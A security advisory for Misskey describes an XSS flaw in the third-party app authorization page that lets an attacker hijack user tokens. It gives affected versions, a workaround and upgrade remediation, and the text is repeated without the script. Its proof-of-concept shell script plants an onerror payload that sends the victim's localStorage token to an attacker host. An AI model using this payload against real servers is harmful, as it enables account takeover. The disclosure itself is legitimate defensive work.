Advisory Author: Acid Chicken (硫酸鶏) [email protected]
Summary
A vulnerability in the authorization page for third-party application could allow a remote attacker to hijack user's token.
Affected Versions
>= 10.46.0 < 10.102.4 || >= 11.0.0-alpha.1 < 11.20.2
Proof of Concept
Token hijacking URL generator (shell script)
Requires bash, curl, and jq.
DO NOT USE THIS COMMAND IN A PRODUCTION ENVIRONMENT
sufferer='localhost:3000' \
attacker='localhost:8080' \
curl -LSs "https://$sufferer/api/auth/session/generate" -d"{\"appSecret\":$( \
curl -LSs "https://$sufferer/api/app/create" \
-d'{"name":"<audio><source onerror=\"location.replace(\"'"https://$attacker"'\"+localStorage.getItem(\"i\"))\">","description":"","permission":[]}' \
| jq .secret \
)}" | jq -r .url
Details
To exploit this vulnerability, the attacker must let target user visit a generated URL.
Workaround
For users, don't visit suspicious URL. If you can't decide whether an URL is suspicious, don't access any websites. For server owners, see below.
Remediation
Upgrade Misskey to version 10.102.4 or higher when you are using v10, otherwise upgrade Misskey to version 11.20.2 or higher.
Advisory Author: Acid Chicken (硫酸鶏) [email protected]
Summary
A vulnerability in the authorization page for third-party application could allow a remote attacker to hijack user's token.
Affected Versions
>= 10.46.0 < 10.102.4 || >= 11.0.0-alpha.1 < 11.20.2
Proof of Concept
Token hijacking URL generator (shell script)
Requires bash, curl, and jq.
DO NOT USE THIS COMMAND IN A PRODUCTION ENVIRONMENT
Details
To exploit this vulnerability, the attacker must let target user visit a generated URL.
Workaround
For users, don't visit suspicious URL. If you can't decide whether an URL is suspicious, don't access any websites. For server owners, see below.
Remediation
Upgrade Misskey to version 10.102.4 or higher when you are using v10, otherwise upgrade Misskey to version 11.20.2 or higher.